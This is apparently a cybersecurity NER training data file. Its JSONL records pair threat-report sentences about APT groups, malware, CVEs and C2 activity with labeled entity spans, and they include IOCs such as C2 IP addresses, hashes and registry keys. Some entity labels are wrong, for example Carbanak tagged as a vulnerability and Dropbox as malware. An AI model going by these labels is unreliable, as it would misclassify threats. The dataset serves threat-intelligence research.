Leafminer": [[4, 13]], "THREAT_ACTOR: operators": [[14, 23]], "VULNERABILITY: EternalBlue": [[28, 39]], "MALWARE: WhiteBear": [[207, 216]]}, "info": {"id": "cyberner_stix_train_005735", "source": "cyberner_stix_train"}} {"text": "Other samples communicated with other servers listed at the bottom of this report . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure . This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries . 
With regards to these similarities , we highlight the following trends which could manifest in future OT malware : •", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[158, 170]], "TOOL: PowerShell": [[210, 220]], "MALWARE: OT malware": [[487, 497]]}, "info": {"id": "cyberner_stix_train_005736", "source": "cyberner_stix_train"}} {"text": "The origins of MiniDuke can thus be traced back to the origins of GeminiDuke , of which the earliest observed sample was compiled in January of 2009 .", "spans": {"MALWARE: MiniDuke": [[15, 23]], "MALWARE: GeminiDuke": [[66, 76]]}, "info": {"id": "cyberner_stix_train_005737", "source": "cyberner_stix_train"}} {"text": "RECEIVE_BOOT_COMPLETED - Allows the application to receive a broadcast after the system finishes booting . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": {"ORGANIZATION: banks": [[213, 218]], "TOOL: emails": [[442, 448]]}, "info": {"id": "cyberner_stix_train_005738", "source": "cyberner_stix_train"}} {"text": "Spread command from C2 The victim receives the command sendSMSMass . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb Loader #2 . 
We believe this is a different campaign and threat actor altogether .", "spans": {"THREAT_ACTOR: APT10": [[69, 74]], "ORGANIZATION: technology": [[219, 229]], "ORGANIZATION: telecommunications sector": [[234, 259]], "ORGANIZATION: MSPs": [[373, 377]], "THREAT_ACTOR: OceanLotus": [[380, 390]], "FILEPATH: C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb": [[393, 474]], "THREAT_ACTOR: threat actor": [[531, 543]]}, "info": {"id": "cyberner_stix_train_005739", "source": "cyberner_stix_train"}} {"text": "Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 .", "spans": {"TOOL: HIDDEN COBRA malware": [[43, 63]], "TOOL: Volgmer": [[122, 129]], "FILEPATH: TajMahal": [[162, 170]]}, "info": {"id": "cyberner_stix_train_005740", "source": "cyberner_stix_train"}} {"text": "These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . 
Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"THREAT_ACTOR: CIA": [[28, 31]], "FILEPATH: document malware": [[264, 280]], "ORGANIZATION: Tibetan non-governmental organizations": [[300, 338]], "ORGANIZATION: NGOs": [[341, 345]], "ORGANIZATION: Falun Gong": [[367, 377]], "ORGANIZATION: Uyghur groups": [[382, 395]]}, "info": {"id": "cyberner_stix_train_005741", "source": "cyberner_stix_train"}} {"text": "The dropper installs 2 files :", "spans": {}, "info": {"id": "cyberner_stix_train_005742", "source": "cyberner_stix_train"}} {"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well .", "spans": {"VULNERABILITY: Carbanak": [[72, 80]], "ORGANIZATION: financial industry": [[97, 115]], "ORGANIZATION: payment providers": [[126, 143]], "ORGANIZATION: retail industry": [[146, 161]], "ORGANIZATION: PR companies": [[166, 178]]}, "info": {"id": "cyberner_stix_train_005743", "source": "cyberner_stix_train"}} {"text": "However , it was detected dynamically by the host intrusion prevention subsystem when it appeared in the system and was executed .", "spans": {}, "info": {"id": "cyberner_stix_train_005744", "source": "cyberner_stix_train"}} {"text": "This variable is decoded with the base64 algorithm in order to get a Windows library ( PE file ) which is written to disk .", "spans": {"SYSTEM: Windows": [[69, 76]], "TOOL: PE": [[87, 89]]}, "info": {"id": "cyberner_stix_train_005745", "source": "cyberner_stix_train"}} {"text": "MESSAGE – send SMS containing specified text to a specified number . 
During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls . CTU researchers also identified components in the custom C2 protocol being used ( the ACT in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": {"MALWARE: XLS-withyourface.xls": [[208, 228]], "MALWARE: XLS-withyourface – test.xls": [[233, 260]], "ORGANIZATION: CTU": [[263, 266]], "MALWARE: custom C2 protocol": [[313, 331]], "THREAT_ACTOR: Nickel Academy": [[450, 464]], "THREAT_ACTOR: Lazarus": [[467, 474]]}, "info": {"id": "cyberner_stix_train_005746", "source": "cyberner_stix_train"}} {"text": "This was more complex .", "spans": {}, "info": {"id": "cyberner_stix_train_005747", "source": "cyberner_stix_train"}} {"text": "Apps with a custom-made advertisement SDK The simplest PHA from the author 's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1 . FireEye detects this activity across our platforms .", "spans": {"ORGANIZATION: Unit 42": [[187, 194]], "TOOL: NetTraveler": [[218, 229]], "VULNERABILITY: CVE-2012-0158": [[251, 264]], "TOOL: NetTraveler Trojan": [[276, 294]], "ORGANIZATION: FireEye": [[388, 395]]}, "info": {"id": "cyberner_stix_train_005748", "source": "cyberner_stix_train"}} {"text": "When DualToy began to spread in January 2015 , it was only capable of infecting Android devices . In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . 
Malware used by Lazarus Group correlates to other reported campaigns , including Operation Flame , Operation 1Mission , Operation Troy , DarkSeoul , and Ten Days of Rain .", "spans": {"MALWARE: DualToy": [[5, 12]], "SYSTEM: Android": [[80, 87]], "ORGANIZATION: we": [[108, 110]], "THREAT_ACTOR: Lazarus Group": [[216, 229]], "MALWARE: Operation Flame": [[281, 296]], "MALWARE: Operation 1Mission": [[299, 317]], "MALWARE: Operation Troy": [[320, 334]], "MALWARE: DarkSeoul": [[337, 346]], "MALWARE: Ten Days of Rain": [[353, 369]]}, "info": {"id": "cyberner_stix_train_005749", "source": "cyberner_stix_train"}} {"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer .", "spans": {}, "info": {"id": "cyberner_stix_train_005750", "source": "cyberner_stix_train"}} {"text": "Command Description push Shows a push notification . The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . 
Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"THREAT_ACTOR: SectorJ04": [[57, 66]], "ORGANIZATION: financial institutions": [[100, 122]], "ORGANIZATION: medical": [[301, 308]], "ORGANIZATION: pharmaceutical": [[311, 325]], "ORGANIZATION: media": [[328, 333]], "ORGANIZATION: energy": [[336, 342]], "ORGANIZATION: manufacturing": [[347, 360]], "ORGANIZATION: Kaspersky": [[374, 383]], "TOOL: Adobe Flash Player": [[417, 435]], "VULNERABILITY: zero-day": [[436, 444]], "VULNERABILITY: CVE-2016-4117": [[461, 474]], "MALWARE: FinSpy": [[521, 527]]}, "info": {"id": "cyberner_stix_train_005751", "source": "cyberner_stix_train"}} {"text": "We believe that , unusually , the purpose of the OnionDuke variant spread via the Tor node was not to pursue targeted attacks but instead to form a small botnet for later use .", "spans": {"MALWARE: OnionDuke": [[49, 58]], "TOOL: Tor": [[82, 85]]}, "info": {"id": "cyberner_stix_train_005752", "source": "cyberner_stix_train"}} {"text": "Privilege escalation requests The screens asking for the user 's approval wo n't close unless the user approves the privilege escalation . Attackers use it to create , expand and cement their foothold in compromised environments . 
Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus .", "spans": {"THREAT_ACTOR: Attackers": [[139, 148]], "THREAT_ACTOR: ScarCruft APT": [[294, 307]]}, "info": {"id": "cyberner_stix_train_005753", "source": "cyberner_stix_train"}} {"text": "SHA256 : 4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273 .", "spans": {"FILEPATH: 4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273": [[9, 73]]}, "info": {"id": "cyberner_stix_train_005754", "source": "cyberner_stix_train"}} {"text": "Virulent Android malware returns , gets > 2 million downloads on Google Play HummingWhale is back with new tricks , including a way to gin user ratings . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia . Two users in the targeted organization received a file called \" JobDetails.rar \" , which attempted to exploit the WinRAR vulnerability . UNC4899 targeting overlaps with a separate RGB - aligned group , APT43 , who in July , 2023 displayed interest in the cryptocurrency vertical , specifically targeting a variety of C - Suite executives from multiple fintech and cryptocurrency companies in the United States , South Korea , Hong Kong , and Singapore .", "spans": {"MALWARE: Virulent": [[0, 8]], "SYSTEM: Android": [[9, 16]], "SYSTEM: Google Play": [[65, 76]], "MALWARE: HummingWhale": [[77, 89]], "FILEPATH: JobDetails.rar": [[354, 368]], "TOOL: WinRAR": [[404, 410]], "THREAT_ACTOR: UNC4899": [[427, 434]], "THREAT_ACTOR: APT43": [[492, 497]], "ORGANIZATION: C - Suite executives from multiple fintech and cryptocurrency companies": [[607, 678]]}, "info": {"id": "cyberner_stix_train_005755", "source": "cyberner_stix_train"}} {"text": "It controls each and every functionality based on the commands sent by the command and control ( C & C ) server . 
However , Buckeye had already been using some of these leaked tools at least a year beforehand . Gorgon Group is a threat group consisting of members who are suspected to be Pakistan based or have other connections to Pakistan .", "spans": {"THREAT_ACTOR: Buckeye": [[124, 131]], "TOOL: leaked tools": [[169, 181]], "THREAT_ACTOR: Gorgon Group": [[211, 223]]}, "info": {"id": "cyberner_stix_train_005756", "source": "cyberner_stix_train"}} {"text": "In that report , we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks .", "spans": {"THREAT_ACTOR: Sofacy": [[56, 62]]}, "info": {"id": "cyberner_stix_train_005757", "source": "cyberner_stix_train"}} {"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 .", "spans": {"TOOL: Powermud backdoor": [[29, 46]], "MALWARE: Backdoor.Powemuddy": [[66, 84]], "TOOL: custom tools": [[93, 105]], "MALWARE: makecab.exe": [[238, 249]], "ORGANIZATION: government": [[338, 348]], "MALWARE: Bookworm Trojan": [[396, 411]]}, "info": {"id": "cyberner_stix_train_005758", "source": "cyberner_stix_train"}} {"text": "This suggests that the operators of the Command & Control are not enforcing a validation of the targets . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . 
Additionally , the generated code by uncompyle6 varies depending on the version and the impact is important . Cisco Secure Malware Analytics ( formerly Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[106, 118]], "THREAT_ACTOR: group": [[156, 161]], "ORGANIZATION: aerospace": [[229, 238]], "ORGANIZATION: energy": [[241, 247]], "ORGANIZATION: financial": [[250, 259]], "ORGANIZATION: government": [[262, 272]], "ORGANIZATION: hospitality": [[275, 286]], "ORGANIZATION: telecommunications business": [[291, 318]], "TOOL: uncompyle6": [[368, 378]], "TOOL: Cisco Secure Malware Analytics": [[441, 471]], "TOOL: Threat Grid": [[483, 494]]}, "info": {"id": "cyberner_stix_train_005759", "source": "cyberner_stix_train"}} {"text": "HammerDuke ’s use of Twitter and crafted image files is reminiscent of other Duke toolsets .", "spans": {"MALWARE: HammerDuke": [[0, 10]], "TOOL: Twitter": [[21, 28]], "THREAT_ACTOR: Duke": [[77, 81]]}, "info": {"id": "cyberner_stix_train_005760", "source": "cyberner_stix_train"}} {"text": "TG-3390 SWCs may be largely geographically independent , but the group's most frequently used C2 registrars and IP net blocks are located in the U.S. Using a U.S. based C2 infrastructure to compromise targets in the U.S. 
helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7], [227, 234]], "SYSTEM: SWCs": [[8, 12]], "TOOL: C2": [[94, 96], [169, 171]]}, "info": {"id": "cyberner_stix_train_005761", "source": "cyberner_stix_train"}} {"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have “ walked back ” the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the “ TRITON actor ” , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: FireEye": [[55, 62]], "THREAT_ACTOR: TEMP.Veles": [[130, 140]], "MALWARE: TRITON": [[188, 194]], "ORGANIZATION: Dragos": [[211, 217]], "THREAT_ACTOR: XENOTIME": [[294, 302]]}, "info": {"id": "cyberner_stix_train_005762", "source": "cyberner_stix_train"}} {"text": "February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28’s Xagent malware , and a new Trojan ransomware . 
In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": {"THREAT_ACTOR: attacker": [[181, 189]], "THREAT_ACTOR: APT28’s": [[211, 218]], "MALWARE: Trojan ransomware": [[246, 263]], "TOOL: emails": [[412, 418]], "ORGANIZATION: government officials": [[429, 449]]}, "info": {"id": "cyberner_stix_train_005763", "source": "cyberner_stix_train"}} {"text": "A closer examination of the tool revealed the second user agent string was from a secondary payload that was retrieved by the cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df sample .", "spans": {"FILEPATH: cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df": [[126, 190]]}, "info": {"id": "cyberner_stix_train_005764", "source": "cyberner_stix_train"}} {"text": "Chinese APK names : Some of FakeSpy ’ s APK package names contain anglicized Chinese ( Mandarin ) words that might be related to Chinese songs and lyrics , food , provinces , etc . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"MALWARE: FakeSpy": [[28, 35]], "TOOL: compromised legitimate accounts": [[209, 240]], "THREAT_ACTOR: Vixen Panda": [[314, 325]], "THREAT_ACTOR: Ke3chang": [[328, 336]], "THREAT_ACTOR: Royal APT": [[339, 348]], "THREAT_ACTOR: Playful Dragon": [[355, 369]]}, "info": {"id": "cyberner_stix_train_005765", "source": "cyberner_stix_train"}} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . 
The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "ORGANIZATION: WikiLeaks'": [[249, 259]], "ORGANIZATION: Twitter": [[311, 318], [375, 382]], "ORGANIZATION: Mark Zuckerberg": [[356, 371]], "ORGANIZATION: Pinterest": [[387, 396]], "ORGANIZATION: BuzzFeed": [[426, 434]], "ORGANIZATION: TechCrunch": [[439, 449]]}, "info": {"id": "cyberner_stix_train_005766", "source": "cyberner_stix_train"}} {"text": "While Sofacy is also known to use of custom exploit frameworks and spear-phishing attacks , it is possible in this case that they managed to obtain privileged credentials of network administrators within the Bundestag through the use of a phishing attack , which then allowed them to navigate through the network and gain access to more data .", "spans": {"THREAT_ACTOR: Sofacy": [[6, 12]], "ORGANIZATION: Bundestag": [[208, 217]]}, "info": {"id": "cyberner_stix_train_005767", "source": "cyberner_stix_train"}} {"text": "The second stage The second stage apps contain the surveillanceware capabilities . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor . The installed service registry key is opened and the 2 values under its Parameter subkey are created . 
A great example is that of the notorious bank robber slick Willy Sutton .", "spans": {"TOOL: PDF documents": [[157, 170]], "THREAT_ACTOR: the notorious bank robber": [[349, 374]], "THREAT_ACTOR: Willy Sutton": [[381, 393]]}, "info": {"id": "cyberner_stix_train_005768", "source": "cyberner_stix_train"}} {"text": "In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": {"MALWARE: Winnti": [[75, 81]], "THREAT_ACTOR: BARIUM": [[86, 92]], "THREAT_ACTOR: LEAD": [[97, 101]]}, "info": {"id": "cyberner_stix_train_005769", "source": "cyberner_stix_train"}} {"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81 In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities . 
Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": {"TOOL: SWC": [[375, 378]], "ORGANIZATION: international industry organization": [[402, 437]], "ORGANIZATION: aerospace": [[452, 461]], "ORGANIZATION: academic": [[464, 472]], "ORGANIZATION: media": [[475, 480]], "ORGANIZATION: technology": [[483, 493]], "ORGANIZATION: government": [[496, 506]], "ORGANIZATION: utilities organizations": [[513, 536]], "TOOL: XGen": [[652, 656]], "ORGANIZATION: Talos": [[795, 800]], "TOOL: Foxit PDF Reader": [[840, 856]]}, "info": {"id": "cyberner_stix_train_005771", "source": "cyberner_stix_train"}} {"text": "As such , these findings represent a collection of compromised websites , compromised registrar accounts used to spin up subdomains , domains used by malware DGA ’s , phishing kits , carding forums , malware C2 sites , and a slew of other domains that revolve around criminal activity .", "spans": {"MALWARE: DGA": [[158, 161]], "TOOL: C2": [[208, 210]]}, "info": {"id": "cyberner_stix_train_005772", "source": "cyberner_stix_train"}} {"text": "Otherwise , it will return a JSON encoded \" OK , '' and if that is the case , the command to be executed . The United States and countries in Europe are targeted as well . The DUDELL sample is a weaponized Microsoft Excel B-IDTY I-TOOL document that contains a malicious macro E-TOOL that runs on the victim ’s machine . 
Subscribing to the Talos weekly newsletter provides information about the most prevalent malware .", "spans": {"MALWARE: DUDELL": [[176, 182]], "TOOL: Microsoft": [[206, 215]], "TOOL: malicious": [[261, 270]], "TOOL: macro E-TOOL": [[271, 283]], "ORGANIZATION: Talos": [[340, 345]]}, "info": {"id": "cyberner_stix_train_005773", "source": "cyberner_stix_train"}} {"text": "Following are some examples of the decoys used by these droppers : The purpose of Exodus One seems to be to collect some basic identifying information about the device ( namely the IMEI code and the phone number ) and send it to the Command & Control server . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later . The attacker used a second trick to avoid analysis of the python code . There was a massive decrease in the activity from Royal , for example , which normally dominates the monthly rankings — often cracking into the top five — with an average of roughly 30 attacks a month in that period .", "spans": {"MALWARE: Exodus One": [[82, 92]], "TOOL: python": [[496, 502]], "THREAT_ACTOR: Royal": [[560, 565]]}, "info": {"id": "cyberner_stix_train_005774", "source": "cyberner_stix_train"}} {"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . 
When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years .", "spans": {"THREAT_ACTOR: APT groups": [[85, 95]], "ORGANIZATION: high-tech": [[190, 199]], "ORGANIZATION: government services": [[202, 221]], "ORGANIZATION: media": [[224, 229]], "ORGANIZATION: financial services industries": [[234, 263]], "ORGANIZATION: New York Times": [[275, 289]], "ORGANIZATION: Mandiant": [[294, 302]]}, "info": {"id": "cyberner_stix_train_005775", "source": "cyberner_stix_train"}} {"text": "The Shadow Brokers , the group that publicly dumped a cache of NSA hacking tools , appears to be back and ready to sell stolen material on an individual basis . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[4, 18]], "TOOL: NSA hacking tools": [[63, 80]]}, "info": {"id": "cyberner_stix_train_005776", "source": "cyberner_stix_train"}} {"text": "Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": {"THREAT_ACTOR: TA459": [[77, 82]]}, "info": {"id": "cyberner_stix_train_005777", "source": "cyberner_stix_train"}} {"text": "First Signs in September 2019 In September 2019 , a tweet by CERT-Bund caught the attention of the IBM Trusteer Mobile Security Research team . specifically CVE-2018-0798 , before downloading subsequent payloads . 
The OilRig group continues to be a persistent adversary group in the Middle East region .", "spans": {"ORGANIZATION: CERT-Bund": [[61, 70]], "ORGANIZATION: IBM Trusteer Mobile Security Research": [[99, 136]], "VULNERABILITY: CVE-2018-0798": [[157, 170]], "THREAT_ACTOR: OilRig group": [[218, 230]]}, "info": {"id": "cyberner_stix_train_005778", "source": "cyberner_stix_train"}} {"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": {"VULNERABILITY: CVE-2011-3544": [[49, 62]], "TOOL: HTTPBrowser backdoor": [[130, 150]], "VULNERABILITY: CVE-2010-0738": [[157, 170]], "TOOL: JBoss": [[192, 197]], "ORGANIZATION: gaming organizations": [[362, 382]]}, "info": {"id": "cyberner_stix_train_005779", "source": "cyberner_stix_train"}} {"text": "In particular , these packages have not been observed to contain or to download exploits which would be required to perform certain types of activities on iOS devices . Some of the documents exploited CVE-2017-0199 to deliver the payload . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater .", "spans": {"SYSTEM: iOS": [[155, 158]], "MALWARE: documents": [[181, 190]], "VULNERABILITY: CVE-2017-0199": [[201, 214]], "ORGANIZATION: Cisco Talos": [[240, 251]], "THREAT_ACTOR: threat actor MuddyWater": [[387, 410]]}, "info": {"id": "cyberner_stix_train_005780", "source": "cyberner_stix_train"}} {"text": "We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores . 
Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state . The global variable value dword_745BB58C is either even or odd , The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": {"MALWARE: Gooligan": [[23, 31]], "SYSTEM: Android": [[97, 104]], "THREAT_ACTOR: APT38": [[127, 132]], "THREAT_ACTOR: groups": [[184, 190]], "MALWARE: INDUSTROYER": [[383, 394]], "MALWARE: INDUSTROYER.V2": [[399, 413]], "MALWARE: malware": [[432, 439]]}, "info": {"id": "cyberner_stix_train_005781", "source": "cyberner_stix_train"}} {"text": "The Android banking Trojan rental business Rental of banking Trojans is not new . Machete was active and constantly working on very effective spearphishing campaigns . This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization .", "spans": {"SYSTEM: Android": [[4, 11]], "THREAT_ACTOR: Machete": [[82, 89]], "THREAT_ACTOR: operators": [[264, 273]], "THREAT_ACTOR: APT38": [[308, 313]]}, "info": {"id": "cyberner_stix_train_005782", "source": "cyberner_stix_train"}} {"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization . APT33 : 64.251.19.214 mynetwork.ddns.net . 
To perform analysis of NetScaler memory core dump files , they need to be collected .", "spans": {"MALWARE: HummingBad": [[19, 29]], "ORGANIZATION: Yingmob": [[52, 59]], "MALWARE: Yinspector": [[140, 150]], "SYSTEM: iOS": [[151, 154]], "THREAT_ACTOR: Lazarus group": [[199, 212]], "THREAT_ACTOR: APT33": [[373, 378]], "DOMAIN: 64.251.19.214": [[381, 394]], "DOMAIN: mynetwork.ddns.net": [[395, 413]], "SYSTEM: NetScaler memory core dump files": [[439, 471]]}, "info": {"id": "cyberner_stix_train_005783", "source": "cyberner_stix_train"}} {"text": "Disable , discontinue , or disallow the use of Internet Control Message Protocol ( ICMP ) and Simple Network Management Protocol ( SNMP ) as much as possible .", "spans": {}, "info": {"id": "cyberner_stix_train_005784", "source": "cyberner_stix_train"}} {"text": "With Version 0.0.0.1 , there is a dedicated functions class where all main malicious activity happens and can be observed . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"ORGANIZATION: Rapid7": [[124, 130]], "MALWARE: Dropbox": [[216, 223]], "MALWARE: POWRUNER": [[236, 244]], "FILEPATH: RTF file": [[277, 285]], "VULNERABILITY: CVE-2017-0199": [[301, 314]]}, "info": {"id": "cyberner_stix_train_005785", "source": "cyberner_stix_train"}} {"text": "To bypass Google Play Store security checks , the malware creators used a very interesting method : they uploaded a clean app to the store at the end of March , 2017 , and would then update it with a malicious version for short period of time . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America . The code is specifically looking for data in Portuguese and English , allowing the attackers to steal credit card data from web pages written in these languages . 
This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use – systems developed decades ago with almost no security measures .", "spans": {"SYSTEM: Google Play Store": [[10, 27]]}, "info": {"id": "cyberner_stix_train_005786", "source": "cyberner_stix_train"}} {"text": "The recent activity in the U.S. is but one of many instances of Russian Government influence operations conducted in support of strategic political objectives , and it will not be the last .", "spans": {}, "info": {"id": "cyberner_stix_train_005787", "source": "cyberner_stix_train"}} {"text": "EventBot web injects execution method Web injects execution method by a pre-established configuration . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: link file": [[113, 122]], "MALWARE: AutoHotkeyU32.exe": [[149, 166]], "THREAT_ACTOR: APT33": [[261, 266]], "MALWARE: DROPSHOT": [[271, 279]], "MALWARE: DROPSHOT samples": [[330, 346]], "MALWARE: SHAPESHIFT": [[396, 406]]}, "info": {"id": "cyberner_stix_train_005788", "source": "cyberner_stix_train"}} {"text": "Turla has been operating for a number of years and its activities have been monitored and analyzed by ESET research laboratories . 
The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "ORGANIZATION: ESET": [[102, 106]], "FILEPATH: malware": [[135, 142]], "MALWARE: EternalBlue exploit": [[299, 318]], "THREAT_ACTOR: WannaCry": [[331, 339]]}, "info": {"id": "cyberner_stix_train_005789", "source": "cyberner_stix_train"}} {"text": "HttpBrowser ( also known as TokenControl ) — A backdoor notable for HTTPS communications with the HttpBrowser User-Agent .", "spans": {"MALWARE: HttpBrowser": [[0, 11], [98, 109]], "MALWARE: TokenControl": [[28, 40]], "TOOL: User-Agent": [[110, 120]]}, "info": {"id": "cyberner_stix_train_005790", "source": "cyberner_stix_train"}} {"text": "It saves the messages ’ metadata and content , filters the information by fields , and sends them to the C2 server using the URL /servlet/SendMassage2 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . 
